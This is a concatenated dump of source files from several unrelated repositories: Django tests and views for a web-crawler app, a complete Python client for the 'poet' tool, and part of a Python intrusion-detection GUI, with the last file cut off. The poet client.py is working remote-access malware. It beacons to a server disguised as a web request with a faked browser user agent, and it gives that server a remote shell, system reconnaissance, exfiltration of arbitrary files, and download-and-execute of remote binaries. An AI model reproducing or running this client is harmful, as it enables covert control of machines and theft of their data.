from memex.test_utils.unit_test_utils import UnitTestSkeleton, form_errors, get_object
from django.test import TestCase
from django.core.files.uploadedfile import SimpleUploadedFile
# App
from apps.crawl_space.forms import AddCrawlForm
from apps.crawl_space.models import Crawl, CrawlModel
from base.models import Project, alphanumeric_validator
def assert_form_errors(response, *errors):
"""Given a response, assert that only the given `errors`
are present in the form response."""
efe = expected_form_errors = set(errors)
assert set(form_errors(response).keys()) - efe == set()
class TestViews(UnitTestSkeleton):
@classmethod
def setUpClass(cls):
"""Initialize a test project and crawl model,
and save them to the test database."""
super(TestViews, cls).setUpClass()
cls.test_project = Project(
name = "Test",
description = "Test Project Description")
cls.test_project.save()
cls.test_crawl = Crawl(
name = "Test Crawl",
description = "Test Crawl Description",
crawler = "nutch",
config = "config_default",
seeds_list = cls.get_seeds(),
project = cls.test_project)
cls.test_crawl.save()
cls.test_crawlmodel = CrawlModel(
name = "Test Crawl Model",
model = cls.get_model_file(),
features = cls.get_features_file(),
project = cls.test_project,
)
cls.test_crawlmodel.save()
@classmethod
def tearDownClass(cls):
shutil.rmtree(cls.test_crawl.get_crawl_path())
@classmethod
def get_model_file(self):
return SimpleUploadedFile('pageclassifier.model', bytes('This is a model file.\n'), 'utf-8')
@classmethod
def get_features_file(self):
return SimpleUploadedFile('pageclassifier.features', bytes('This is a features file.\n'), 'utf-8')
@classmethod
def get_seeds(self):
"""Return a new instance of SimpleUploadedFile. This file can only
be used once."""
return SimpleUploadedFile('ht.seeds', bytes('This is some content.\n'), 'utf-8')
@property
def form_data(self):
"""Provide a dictionary of valid form data."""
return {
'name': 'Cat Crawl',
'description': 'Find all the cats.',
'crawler': 'ache',
'seeds_list': self.get_seeds(),
'crawl_model': self.test_crawlmodel.pk,
}
@property
def slugs(self):
"""Return a dictionary with a "test" project slug."""
return dict(slugs=dict(
project_slug="test"))
@property
def crawl_slugs(self):
"""Return a dictionary with a "test" project slug and
a "test-crawl" crawl slug."""
return dict(slugs=dict(
project_slug="test",
crawl_slug="test-crawl"))
def test_add_crawl_page(self):
"""Get the add_crawl page with **self.slugs and assert that
the right template is returned."""
response = self.get('base:crawl_space:add_crawl', **self.slugs)
assert 'crawl_space/add_crawl.html' in response.template_name
def test_add_crawl_no_data(self):
"""Post with an empty form, assert that each of the missings fields
prompts an error."""
response = self.post('base:crawl_space:add_crawl', **self.slugs)
assert_form_errors(response, *self.form_data.keys())
def test_add_crawl_bad_name(self):
"""Post with a non-alphanumeric name."""
import re
form_data = self.form_data
form_data['name'] = bad_name = "lEe7$|>EE|<"
validator = alphanumeric_validator()
assert re.match(validator.regex, bad_name) is None
response = self.post('base:crawl_space:add_crawl',
form_data, **self.slugs)
assert_form_errors(response, 'name')
def test_add_crawl_bad_crawler(self):
"""Post with an invalid crawler."""
form_data = self.form_data
form_data['crawler'] = "error"
response = self.post('base:crawl_space:add_crawl',
form_data, **self.slugs)
assert_form_errors(response, 'crawl_model', 'crawler')
def test_add_crawl_success(self):
"""Post with a valid form payload, and assert that
the client is redirected to the appropriate crawl page."""
response = self.post('base:crawl_space:add_crawl',
self.form_data,
**self.slugs)
assert 'crawl_space/crawl.html' in response.template_name
def test_crawl_page(self):
"""Get the test crawl page, and assert that the
crawl slug is generated properly and the project
is linked correctly."""
response = self.get('base:crawl_space:crawl', **self.crawl_slugs)
assert 'crawl_space/crawl.html' in response.template_name
crawl = get_object(response)
assert (crawl.name, crawl.slug) == ("Test Crawl", "test-crawl")
assert crawl.project == self.test_project
def test_crawl_settings_page(self):
response = self.get('base:crawl_space:crawl_settings', **self.crawl_slugs)
assert 'crawl_space/crawl_update_form.html' in response.template_name
def test_crawl_settings_change_name(self):
response = self.post('base:crawl_space:crawl_settings',
{'name': 'Cat Crawl'}, **self.crawl_slugs)
crawl = get_object(response)
assert crawl.name == "Cat Crawl"
def test_crawl_settings_change_description(self):
response = self.post('base:crawl_space:crawl_settings',
{'description': 'A crawl for information about cats.'},
**self.crawl_slugs)
crawl = get_object(response)
assert crawl.description == "A crawl for information about cats."
def test_crawl_delete(self):
response = self.post('base:crawl_space:delete_crawl',
**self.crawl_slugs)
assert 'base/project.html' in response.template_name
```
#### File: apps/crawl_space/views.py
```python
import os
from os.path import join
import sys
import json
import csv
import subprocess
import shutil
import itertools
from django.views.generic import ListView, DetailView
from django.views.generic.base import ContextMixin
from django.views.generic.edit import CreateView, DeleteView, UpdateView
from django.contrib.messages.views import SuccessMessageMixin
from django.apps import apps
from django.http import HttpResponse
from django.utils.decorators import method_decorator
from django.views.decorators.csrf import csrf_exempt
from base.models import Project
from apps.crawl_space.models import Crawl, CrawlModel
from apps.crawl_space.forms import AddCrawlForm, AddCrawlModelForm, CrawlSettingsForm
from apps.crawl_space.utils import touch
from apps.crawl_space.viz.plot import AcheDashboard
from apps.crawl_space.settings import CRAWL_PATH, IMAGES_PATH
class ProjectObjectMixin(ContextMixin):
def get_project(self):
return Project.objects.get(slug=self.kwargs['project_slug'])
def get_context_data(self, **kwargs):
# Call the base implementation first to get a context
context = super(ProjectObjectMixin, self).get_context_data(**kwargs)
context['project'] = self.get_project()
return context
class AddCrawlView(SuccessMessageMixin, ProjectObjectMixin, CreateView):
form_class = AddCrawlForm
template_name = "crawl_space/add_crawl.html"
success_message = "Crawl %(name)s was saved successfully."
def get_success_url(self):
return self.object.get_absolute_url()
def form_valid(self, form):
form.instance.project = self.get_project()
return super(AddCrawlView, self).form_valid(form)
class ListCrawlsView(ProjectObjectMixin, ListView):
model = Crawl
template_name = "crawl_space/crawls.html"
class CrawlView(ProjectObjectMixin, DetailView):
model = Crawl
template_name = "crawl_space/crawl.html"
@method_decorator(csrf_exempt)
def dispatch(self, *args, **kwargs):
return super(CrawlView, self).dispatch(*args, **kwargs)
def post(self, request, *args, **kwargs):
crawl_model = self.get_object()
# Start
if request.POST['action'] == "start":
crawl_model.status = "starting"
crawl_model.save()
project_slug = self.kwargs['project_slug']
crawl_slug = self.kwargs['crawl_slug']
call = ["python",
"apps/crawl_space/crawl_supervisor.py",
"--project", project_slug,
"--crawl", crawl_slug]
subprocess.Popen(call)
return HttpResponse(json.dumps(dict(
status="starting")),
content_type="application/json")
# Stop
elif request.POST['action'] == "stop":
crawl_model.status = 'stopping'
crawl_model.save()
crawl_path = crawl_model.get_crawl_path()
# TODO use crawl_model.status as a stop flag
touch(join(crawl_path, 'stop'))
return HttpResponse(json.dumps(dict(
status="stopping")),
content_type="application/json")
# Dump Images
elif request.POST['action'] == "dump":
self.dump_images()
return HttpResponse("Success")
# Update status, statistics
elif request.POST['action'] == "status":
return HttpResponse(json.dumps(dict(
status=crawl_model.status,
harvest_rate=crawl_model.harvest_rate,
pages_crawled=crawl_model.pages_crawled,
)),
content_type="application/json")
# TESTING reflect POST request
return HttpResponse(json.dumps(dict(
args=args,
kwargs=kwargs,
post=request.POST)),
content_type="application/json")
def dump_images(self):
self.img_dir = os.path.join(IMAGES_PATH, self.get_object().slug)
if os.path.exists(self.img_dir):
shutil.rmtree(self.img_dir)
else:
os.makedirs(self.img_dir)
img_dump_proc = subprocess.Popen(["nutch", "dump", "-outputDir", self.img_dir, "-segment",
os.path.join(self.get_object().get_crawl_path(), 'segments'),"-mimetype",
"image/jpeg", "image/png"]).wait()
return "Dumping images"
def get(self, request, *args, **kwargs):
# Get Relevant Seeds File
if not request.GET:
# no url parameters, return regular response
return super(CrawlView, self).get(request, *args, **kwargs)
elif 'resource' in request.GET and request.GET['resource'] == "seeds":
seeds = self.get_ache_dashboard().get_relevant_seeds()
response = HttpResponse(content_type='text/plain')
response['Content-Disposition'] = 'attachment; filename=relevant_seeds.txt'
response.write('\n'.join(seeds))
return response
elif 'resource' in request.GET and request.GET['resource'] == "initial_seeds":
seeds = self.get_seeds_list()
response = HttpResponse(content_type='text/plain')
response['Content-Disposition'] = 'attachment; filename=seeds.txt'
response.write(''.join(seeds))
return response
elif 'resource' in request.GET and request.GET['resource'] == "crawl_log":
crawl_log = self.get_crawl_log()
response = HttpResponse(content_type='text/plain')
response['Content-Disposition'] = 'attachment; filename=crawl_log.txt'
response.write(crawl_log)
return response
def get_crawl_log(self):
log_path = os.path.join(self.get_object().get_crawl_path(), "crawl_proc.log")
with open(log_path) as f:
crawl_log = f.readlines()
return ''.join(crawl_log)
def get_seeds_path(self):
if self.get_object().crawler == "nutch":
seeds_path = os.path.join(self.get_object().seeds_list.path, "seeds")
elif self.get_object().crawler == "ache":
seeds_path = self.get_object().seeds_list.path
else:
seeds_path = ""
return seeds_path
def get_seeds_list(self, lines=None):
with open(self.get_seeds_path()) as f:
if lines:
seeds_list = list(itertools.islice(f, lines))
else:
seeds_list = f.readlines()
return seeds_list
def get_object(self):
return Crawl.objects.get(
project=self.get_project(),
slug=self.kwargs['crawl_slug'])
def get_ache_dashboard(self):
return AcheDashboard(self.get_object())
def get_context_data(self, **kwargs):
context = super(CrawlView, self).get_context_data(**kwargs)
context['project'] = self.get_project()
context['seeds'] = self.get_seeds_list(10)
if self.get_object().crawler == "ache":
plots = AcheDashboard(self.get_object()).get_plots()
context['scripts'] = plots['scripts']
context['divs'] = plots['divs']
return context
class CrawlSettingsView(SuccessMessageMixin, ProjectObjectMixin, UpdateView):
model = Crawl
form_class = CrawlSettingsForm
success_message = "Crawl %(name)s was edited successfully."
template_name_suffix = '_update_form'
def get_success_url(self):
return self.object.get_absolute_url()
def get_object(self):
return Crawl.objects.get(
project=self.get_project(),
slug=self.kwargs['crawl_slug'])
class AddCrawlModelView(SuccessMessageMixin, ProjectObjectMixin, CreateView):
form_class = AddCrawlModelForm
template_name = "crawl_space/add_crawl_model.html"
success_message = "Crawl model %(name)s was added successfully."
def form_valid(self, form):
form.instance.project = self.get_project()
return super(AddCrawlModelView, self).form_valid(form)
def get_success_url(self):
return self.object.get_absolute_url()
class DeleteCrawlView(SuccessMessageMixin, ProjectObjectMixin, DeleteView):
model = Crawl
success_message = "Crawl %(name)s was deleted successfully."
def delete(self, request, *args, **kwargs):
""" Remove crawl folder """
# shutil.rmtree(os.path.join(CRAWL_PATH, str(self.get_object().pk)))
return super(DeleteCrawlView, self).delete(request, *args, **kwargs)
def get_success_url(self):
return self.get_project().get_absolute_url()
def get_object(self):
return Crawl.objects.get(project=self.get_project(),
slug=self.kwargs['crawl_slug'])
class DeleteCrawlModelView(SuccessMessageMixin, ProjectObjectMixin, DeleteView):
model = CrawlModel
success_message = "Crawl model %(name)s was deleted successfully."
def get_success_url(self):
return self.get_project().get_absolute_url()
def get_object(self):
return CrawlModel.objects.get(
project=self.get_project(),
slug=self.kwargs['model_slug'])
```
#### File: test_crawl/tests/test_nutch_crawl.py
```python
from __future__ import unicode_literals
import os
import shutil
from django.core.urlresolvers import reverse
from django.conf import settings
# # Test
from memex.test_utils.unit_test_utils import UnitTestSkeleton, get_object
from django.core.files.uploadedfile import SimpleUploadedFile
# # App
from apps.crawl_space.models import Crawl
from base.models import Project
class TestViews(UnitTestSkeleton):
@classmethod
def setUpClass(cls):
"""Initialize a test project and crawl,
and save them to the test database."""
super(TestViews, cls).setUpClass()
shutil.rmtree(os.path.join(settings.MEDIA_ROOT, 'crawls'))
cls.test_project = Project(
name = "Crawl Operation",
description = "Test Project Description")
cls.test_project.save()
cls.test_crawl = Crawl(
name = "Test Crawl Operation",
description = "Test Crawl Description",
crawler = "nutch",
config = "config_default",
seeds_list = cls.get_seeds(),
project = cls.test_project)
cls.test_crawl.save()
@classmethod
def tearDownClass(cls):
shutil.rmtree(cls.test_crawl.get_crawl_path())
@classmethod
def get_seeds(self):
"""Return a new instance of SimpleUploadedFile. This file can only
be used once."""
# /content/1
crawl_seed = reverse('base:test_crawl:content',
kwargs=dict(project_slug=self.test_project.slug, content_id=1))
return SimpleUploadedFile('ht.seeds', bytes(crawl_seed), 'utf-8')
@property
def crawl_slugs(self):
"""Return a dictionary with a "test" project slug and
a "test-crawl" crawl slug."""
return dict(slugs=dict(
project_slug="crawl-operation",
crawl_slug="test-crawl-operation"))
def test_nutch_crawl(self):
"""Get the test crawl page, and assert that the
crawl slug is generated properly and the project
is linked correctly."""
response = self.get('base:crawl_space:crawl', **self.crawl_slugs)
assert 'crawl_space/crawl.html' in response.template_name
crawl = get_object(response)
assert crawl.project == self.test_project
response = self.post('base:crawl_space:crawl', data={'action': 'start'},
**self.crawl_slugs)
assert "starting" in response.content
# assert crawl_is_running
assert True
``` |
{
"source": "0x0mar/poet",
"score": 3
} |
#### File: 0x0mar/poet/client.py
```python
import os
import re
import sys
import stat
import time
import zlib
import base64
import select
import socket
import struct
import os.path
import urllib2
import argparse
import tempfile
import logging as log
import subprocess as sp
from datetime import datetime
PREFIX_LEN = 4
SIZE = 4096
UA = 'Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/2.0.0.11'
class PoetSocket(object):
"""Socket wrapper for client/server communications.
Attributes:
s: socket instance
Socket abstraction which uses the convention that the message is prefixed
by a big-endian 32 bit value indicating the length of the following base64
string.
"""
def __init__(self, s):
self.s = s
def close(self):
self.s.close()
def exchange(self, msg):
self.send(msg)
return self.recv()
def send(self, msg):
"""Send message over socket."""
pkg = base64.b64encode(msg)
pkg_size = struct.pack('>i', len(pkg))
sent = self.s.sendall(pkg_size + pkg)
if sent:
raise socket.error('socket connection broken')
def recv(self):
"""Receive message from socket.
Returns:
The message sent from client.
"""
chunks = []
bytes_recvd = 0
# In case we don't get all 4 bytes of the prefix the first recv(),
# this ensures we'll eventually get it intact
while bytes_recvd < PREFIX_LEN:
chunk = self.s.recv(PREFIX_LEN)
if not chunk:
raise socket.error('socket connection broken')
chunks.append(chunk)
bytes_recvd += len(chunk)
initial = ''.join(chunks)
msglen, initial = (struct.unpack('>I', initial[:PREFIX_LEN])[0],
initial[PREFIX_LEN:])
del chunks[:]
bytes_recvd = len(initial)
chunks.append(initial)
while bytes_recvd < msglen:
chunk = self.s.recv(min((msglen - bytes_recvd, SIZE)))
if not chunk:
raise socket.error('socket connection broken')
chunks.append(chunk)
bytes_recvd += len(chunk)
return base64.b64decode(''.join(chunks))
class PoetSocketClient(PoetSocket):
def __init__(self, host, port):
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s.connect((host, port))
super(PoetSocketClient, self).__init__(self.s)
class PoetClient(object):
"""Core client functionality.
Receives commands from server, does bidding, responds.
Note: In any function with `inp' as a parameter, `inp' refers to the
command string sent from the server.
Attributes:
host: server ip address
port: server port
"""
def __init__(self, host, port):
self.host = host
self.port = port
def start(self):
"""Core Poet client functionality."""
s = PoetSocketClient(self.host, self.port)
while True:
try:
inp = s.recv()
if inp == 'fin':
break
elif inp == 'getprompt':
s.send(self.get_prompt())
elif re.search('^exec ("[^"]+"\ )+$', inp + ' '):
s.send(self.execute(inp))
elif inp == 'recon':
s.send(zlib.compress(self.recon()))
elif inp.startswith('shell '):
self.shell(inp, s)
s.send('shelldone')
elif inp.startswith('exfil '):
try:
with open(os.path.expanduser(inp[6:])) as f:
s.send(zlib.compress(f.read()))
except IOError as e:
s.send(e.strerror)
elif inp == 'selfdestruct':
try:
if not args.delete:
os.remove(__file__)
if __file__.strip('./') not in os.listdir('.'):
s.send('boom')
sys.exit()
else:
raise Exception('client not deleted')
except Exception as e:
s.send(str(e.message))
elif inp.startswith('dlexec '):
try:
self.dlexec(inp)
s.send('done')
except Exception as e:
s.send(str(e.message))
elif inp.startswith('chint'):
self.chint(s, inp)
else:
s.send('Unrecognized')
except socket.error as e:
if e.message == 'too much data!':
s.send('psh : ' + e.message)
else:
raise
s.close()
def execute(self, inp):
"""Handle server `exec' command.
Execute specially formatted input string and return specially formatted
response.
"""
out = ''
cmds = self.parse_exec_cmds(inp)
for cmd in cmds:
cmd_out = self.cmd_exec(cmd)
out += '='*20 + '\n\n$ {}\n{}\n'.format(cmd, cmd_out)
return out
def recon(self):
"""Executes recon commands."""
ipcmd = 'ip addr' if 'no' in self.cmd_exec('which ifconfig') else 'ifconfig'
exec_str = 'exec "whoami" "id" "uname -a" "lsb_release -a" "{}" "w" "who -a"'.format(ipcmd)
return self.execute(exec_str)
def dlexec(self, inp):
"""Handle server `dlexec' command.
Download file from internet, save to temp file, execute.
"""
r = urllib2.urlopen(inp.split()[1])
# don't delete the file automatically because otherwise something weird
# happens and we might (will) delete the file before it gets loaded
# into memory? if we didn't include this, we would need to call wait()
# or sp.call() instead later on
with tempfile.NamedTemporaryFile(delete=False) as f:
f.write(r.read())
os.fchmod(f.fileno(), stat.S_IRWXU)
f.flush() # ensure that file was actually written to disk
# intentionally not using sp.call() here because we don't
# necessarily want to wait() on the process
sp.Popen(f.name, stdout=open(os.devnull, 'w'), stderr=sp.STDOUT)
def chint(self, s, inp):
"""Handle server `chint' command.
Send back the current delay interval or set it to new value.
"""
if inp == 'chint':
# no arg, so just send back the interval
s.send(str(args.interval))
else:
# set interval to arg
try:
num = int(inp[6:])
if num < 1 or num > 60*60*24:
msg = 'Invalid interval time.'
else:
args.interval = num
msg = 'done'
s.send(msg)
except Exception as e:
s.send(str(e.message))
def shell(self, inp, s):
"""Psh `shell' command client-side.
Create a subprocess for command and line buffer command output to
server while listening for signals from server.
Args:
s: PoetSocketClient instance
"""
inp = inp[6:] # get rid of 'shell ' prefix
# handle cd builtin
if re.search('^cd( .+)?$', inp):
if inp == 'cd':
os.chdir(os.path.expanduser('~'))
else:
try:
os.chdir(os.path.expanduser(inp[3:]))
except OSError as e:
s.send('cd: {}\n'.format(e.strerror))
return
# everything else
proc = sp.Popen(inp, stdout=sp.PIPE, stderr=sp.STDOUT, shell=True)
while True:
readable = select.select([proc.stdout, s.s], [], [], 30)[0]
for fd in readable:
if fd == proc.stdout: # proc has stdout/err to send
output = proc.stdout.readline()
if output:
s.send(output)
else:
return
elif fd == s.s: # remote signal from server
sig = s.recv()
if sig == 'shellterm':
proc.terminate()
return
def cmd_exec(self, cmd):
"""Light wrapper over subprocess.Popen()."""
return sp.Popen(cmd, stdout=sp.PIPE, stderr=sp.STDOUT,
shell=True).communicate()[0]
def get_prompt(self):
"""Create shell prompt.
Using current user and hostname, create shell prompt for server `shell'
command.
"""
user = self.cmd_exec('whoami').strip()
hn = self.cmd_exec('hostname').strip()
end = '#' if user == 'root' else '$'
return '{}@{} {} '.format(user, hn, end)
def parse_exec_cmds(self, inp):
"""Parse string provided by server `exec' command.
Convert space delimited string with commands to execute in quotes, for
example ("ls -l" "cat /etc/passwd") into list with commands as strings.
Returns:
List of commands to execute.
"""
cmds = []
inp = inp[5:]
num_cmds = inp.count('"') / 2
for i in range(num_cmds):
first = inp.find('"')
second = inp.find('"', first+1)
cmd = inp[first+1:second]
cmds.append(cmd)
inp = inp[second+2:]
return cmds
def get_args():
""" Parse arguments and return dictionary. """
parser = argparse.ArgumentParser()
parser.add_argument('host', metavar='IP', type=str, help='server')
parser.add_argument('interval', metavar='INTERVAL', type=int, help='(s)')
parser.add_argument('-p', '--port')
parser.add_argument('-v', '--verbose', action="store_true")
parser.add_argument('-d', '--delete', action="store_true",
help="delete client upon execution")
return parser.parse_args()
def is_active(host, port):
"""Check if server is active.
Send HTTP GET for a fake /style.css which server will respond to if it's
alive.
Args:
host: server ip address
port: server port
Returns:
Boolean for server state.
"""
try:
url = 'http://{}:{}/style.css'.format(host, port)
req = urllib2.Request(url, headers={'User-Agent': UA})
f = urllib2.urlopen(req)
if f.code == 200:
return True
except urllib2.URLError:
pass
return False
def main():
global args
args = get_args()
if args.verbose:
log.basicConfig(format='%(message)s', level=log.INFO)
else:
log.basicConfig(format='%(message)s')
if args.delete:
log.info('[+] Deleting client.')
os.remove(__file__)
HOST = args.host
PORT = int(args.port) if args.port else 443
log.info(('[+] Poet started with interval of {} seconds to port {}.' +
' Ctrl-c to exit.').format(args.interval, PORT))
try:
while True:
if is_active(HOST, PORT):
log.info('[+] ({}) Server is active'.format(datetime.now()))
PoetClient(HOST, PORT).start()
else:
log.info('[!] ({}) Server is inactive'.format(datetime.now()))
time.sleep(args.interval)
except KeyboardInterrupt:
print
log.info('[-] ({}) Poet terminated.'.format(datetime.now()))
except socket.error as e:
log.info('[!] ({}) Socket error: {}'.format(datetime.now(), e.message))
log.info('[-] ({}) Poet terminated.'.format(datetime.now()))
sys.exit(0)
if __name__ == '__main__':
main()
``` |
{
"source": "0x0mar/PyDetector",
"score": 3
} |
#### File: 0x0mar/PyDetector/alerts.py
```python
import Tkinter
import base64
import thread
from Tkconstants import *
from Tkinter import *
from PIL import Image, ImageTk
import capture
import parse_packet
import time
import ips
alpha=10
global mla
flag=0
global ta
global frame
s_no=1
def iptables():
ipt=Tk()
ipt.wm_title("IPTABLES")
#frame = Tkinter.Frame(ipt, relief=RAISED,width=10, height=11,colormap="new")
##frame.pack(fill=BOTH,expand=1)
for i in ips.set_ips:
rd=Tkinter.Radiobutton(ipt, text="%s : %s : %s : %s : %s"%(i[0], i[1], i[2], i[3], i[4]), width=150, indicatoron=0, activeforeground="blue", padx=20, pady=5, command=lambda: ips.flush(i[1], i[4]))
rd.pack()
#rd=Tkinter.Radiobutton(frame,text="ss",width=20,command=ips.flush)
#rd.pack()
#rd=Tkinter.Radiobutton(frame,text="ss",width=20,command=ips.flush)
#rd.pack()
#RADIOBUTTON(ipt,text="ips").pack()
w=5000
h=3000
ws = ipt.winfo_screenwidth()
hs = ipt.winfo_screenheight()
#calculate position x, y
x = (ws/2) - (w/2)
y = (hs/2) - (h/2)
ipt.geometry('%dx%d+%d+%d' % (w, h, x, y))
ipt.mainloop()
def insert(s_addr,s_mac,message,attack,severity):
print "in alert.insert"
global mla,s_no
#print parse_packet.s_addr
mla.insert(END,('%d' % s_no , '%s'%(time.strftime("%d/%m/%Y")),'%s'% (time.strftime("%H:%M:%S")),'%s' %message,'%s'% attack,'%s' %s_addr,'%s'%s_mac,'%s' %severity))
mla.pack(expand=YES,fill=BOTH)
s_no=s_no+1
print parse_packet.s_addr
#mlb.pack(expand=YES,fill=BOTH)
#frame = Tkinter.Frame(tk, relief=RAISED,width=1786, height=11, colormap="new")
#frame.pack(fill=BOTH,expand=1)
#label = Tkinter.Label(frame, text="")
#label.pack(fill=X, expand=1)
#button = Tkinter.Button(frame,text="Exit",command=PyDetector.destroy)
#button.pack(side=BOTTOM)
#tk.mainloop( )
ta.update()
'''
def start_fix_thread(self):
thread.start_new_thread(ips.main(self,))
def start_flush_thread(self):
thread.start_new_thread(iptables(self,))
'''
def main(self):
print "in alert.main-----------"
global flag
global ta
global mla
flag=99
ta = Tk( )
ta.wm_title("Alerts")
#image = Image.open("/root/Desktop/kali.png")
#photo = ImageTk.PhotoImage(image)
#Label(ta,text='',photo=image).pack( )
#ips_o=ips.ips()
Button(ta,text="FIX",width=20,fg='black',bg='green',command=ips.main).pack(side=TOP)
Button(ta,text="FLUSH",width=20,fg='black',bg='green',command=iptables).pack(side=TOP)
mla = MultiListbox(ta, (('S.No.',1),('Date',3),('Time',3),('Message',20),('Attack', 10),('Source address',10),('Source Mac',10),('Severity', 3)))
#for i in range(1000):
# mlb.insert(END,('Alert generated for: %d' % i, 'TCP','10/10/%04d' % (1900+i)))
#while(True):
mla.pack(expand=YES,fill=BOTH)
#frame = Tkinter.Frame(tk, relief=RAISED,width=1786, height=11, colormap="new")
#frame.pack(fill=BOTH,expand=1)
#label = Tkinter.Label(frame, text="")
#label.pack(fill=X, expand=1)
#mlb.after(self,1000,self.updateGUI)
w=5000
h=3000
ws = ta.winfo_screenwidth()
hs = ta.winfo_screenheight()
#calculate position x, y
x = (ws/2) - (w/2)
y = (hs/2) - (h/2)
ta.geometry('%dx%d+%d+%d' % (w, h, x, y))
ta.mainloop( )
class MultiListbox(Frame):
def __init__(self, master, lists):
Frame.__init__(self, master)
self.lists = []
for l,w in lists:
frame = Frame(self); frame.pack(side=LEFT,expand=YES, fill=BOTH)
#frame.pack(side=,expand=YES, fill=BOTH)
Label(frame, text=l, borderwidth=7,relief=RAISED).pack(fill=X)
lb = Listbox(frame, width=w, borderwidth=1,selectborderwidth=1,selectbackground='cyan',selectforeground='red',cursor='pirate',relief=RAISED, exportselection=FALSE)
lb.pack(expand=YES, fill=BOTH)
self.lists.append(lb)
lb.bind('<B1-Motion>', lambda e, s=self:
s._select(e.y))
lb.bind('<Button-1>', lambda e, s=self:
s._select(e.y))
lb.bind('<Leave>', lambda e: 'break')
lb.bind('<B2-Motion>', lambda e, s=self:
s._b2motion(e.x, e.y))
lb.bind('<Button-2>', lambda e, s=self:
s._button2(e.x, e.y))
frame = Frame(self); frame.pack(side=LEFT, fill=Y)
Label(frame, borderwidth=1,relief=RAISED).pack(fill=X)
sb = Scrollbar(frame, orient=VERTICAL,command=self._scroll)
sb.pack(expand=YES, fill=Y)
self.lists[0]['yscrollcommand']=sb.set
def _select(self, y):
row = self.lists[0].nearest(y)
self.selection_clear(0, END)
self.selection_set(row)
return 'break'
def _button2(self, x, y):
for l in self.lists: l.scan_mark(x, y)
return 'break'
def _b2motion(self, x, y):
for l in self.lists: l.scan_dragto(x, y)
return 'break'
def _scroll(self, *args):
for l in self.lists:
apply(l.yview, args)
def curselection(self):
return self.lists[0].curselection()
def delete(self, first, last=None):
for l in self.lists:
l.delete(first, last)
def get(self, first, last=None):
result = []
for l in self.lists:
result.append(l.get(first,last))
if last: return apply(map, [None] + result)
return result
def index(self, index):
self.lists[0].index(index)
def insert(self, index, *elements):
for e in elements:
i = 0
for l in self.lists:
l.insert(index, e[i])
i = i + 1
def size(self):
return self.lists[0].size()
def see(self, index):
for l in self.lists:
l.see(index)
def selection_anchor(self, index):
for l in self.lists:
l.selection_anchor(index)
def selection_clear(self, first, last=None):
for l in self.lists:
l.selection_clear(first, last)
def selection_includes(self, index):
return self.lists[0].selection_includes(index)
def selection_set(self, first, last=None):
for l in self.lists:
l.selection_set(first, last)
if __name__=='__main__':
main()
```
#### File: 0x0mar/PyDetector/capture.py
```python
import pcapy
from timeit import default_timer
#from threading import Timer
#from logs import *
start=0
duration_sync_flood=0
total_packets=0
global packets
packets=[]
no_syn_packets=0
no_syn_ack_packets=0
no_ack_packets=0
def main(self):
#list all devices
global start, total_packets
start = default_timer()
print "in capture main"
devices = pcapy.findalldevs()
print devices
#ask user to enter device name to sniff
print "Available devices are :"
for d in devices :
print d
# dev = raw_input("Enter device name to sniff : ")
# print "Sniffing device " + dev
dev="eth0"
'''
open device
# Arguments here are:
# device
# snaplen (maximum number of bytes to capture _per_packet_)
# promiscious mode (1 for true)
# timeout (in milliseconds)
'''
cap = pcapy.open_live(dev , 65536 , 1 , 0)
#start sniffing packets
while(True) :
print "total packet = %d" %total_packets
(header, p) = cap.next()
packets.append(p)
total_packets=total_packets+1
if(total_packets>=0):
#print packets[total_packets-1]
pass
#print ('%s: captured %d bytes, truncated to %d bytes' %(datetime.datetime.now(), header.getlen(), header.getcaplen()))
#parse_packet(packet)
#Convert a string of 6 characters of ethernet address into a dash separated hex string
#function to parse a packet
if __name__ == "__main__":
main()
```
#### File: 0x0mar/PyDetector/main_window.py
```python
import Tkinter
from Tkinter import *
import logs
import Tkinter
import thread
import parse_packet
import capture
import tkMessageBox
import alerts
class main_window:
def invalid(self):
tkMessageBox.showerror("", "Invalid Username or Password")
def donothing(self):
filewin = Toplevel()
button = Button(filewin, text="Do nothing button")
button.pack()
def start_capture_thread(self):
# cap = thread(target=capture.main, name="capture_thread")
thread.start_new_thread(capture.main,(self,))
thread.start_new_thread(parse_packet.main,(self,))
def start_logs_thread(self):
# log = thread(target=logs.main, name="logs_thread")
thread.start_new_thread(logs.main,(self,))
def start_alerts_thread(self):
thread.start_new_thread(alerts.main(self,))
def stop(self):
pass
def main(self):
#cap=capture()
#cap.main()
#cap.main()
root=Tk()
#alt = Thread(target=capture.main, args=(i,))
root.wm_title("PyDetector")
menubar = Menu(root)
adminmenu = Menu(menubar, tearoff=0)
adminmenu.add_command(label="Configuration", command=self.donothing)
#adminmenu.add_command(label="", command=donothing)
#adminmenu.add_command(label="", command=donothing)
#adminmenu.add_command(label="Save as...", command=donothing)
#adminmenu.add_command(label="Close", command=donothing)
adminmenu.add_separator()
adminmenu.add_command(label="Exit", command=root.quit)
menubar.add_cascade(label="Administration", menu=adminmenu)
viewmenu = Menu(menubar, tearoff=0)
#viewmenu.add_command(label="Undo", command=donothing)
viewmenu.add_separator()
viewmenu.add_command(label="Logs", command=self.start_logs_thread)
viewmenu.add_command(label="Alerts", command=self.start_alerts_thread)
#viewmenu.add_command(label="", command=donothing)
#viewmenu.add_command(label="P", command=donothing)
#viewmenu.add_command(label="D", command=donothing)
#viewmenu.add_command(label="S", command=donothing)
viewmenu.add_command(label="Exit", command=root.quit)
menubar.add_cascade(label="View", menu=viewmenu)
#menubar.add_cascade(label="Alerts", menu=viewmenu)
helpmenu = Menu(menubar, tearoff=0)
helpmenu.add_command(label="Help Index", command=self.donothing)
helpmenu.add_command(label="About...", command=self.donothing)
menubar.add_cascade(label="Help", menu=helpmenu)
btn_start=Tkinter.Button(root,text="Capture",width=10,fg="black",command=self.start_capture_thread)
btn_start.pack()
btn_stop=Tkinter.Button(root,text="STOP",width=10,fg="red",command=self.stop)
btn_stop.pack(pady=20,padx=20)
# btn_stop=Tkinter.Button(root,text="Login",width=10,command=stop)
#root.config(menu=menubar)
root.config(menu=menubar)
w=5000
h=3000
ws = root.winfo_screenwidth()
hs = root.winfo_screenheight()
#calculate position x, y
x = (ws/2) - (w/2)
y = (hs/2) - (h/2)
root.geometry('%dx%d+%d+%d' % (w, h, x, y))
root.mainloop()
#if __name__=='__main__':
# main_window.main()
```
#### File: 0x0mar/PyDetector/parse_packet.py
```python
import socket
from struct import *
import datetime
import pcapy
import sys
import time
from timeit import default_timer
import logs
from threading import Timer
import capture
import alerts
import ips
import db_load
import MySQLdb
global protocol
global s_addr
global d_addr
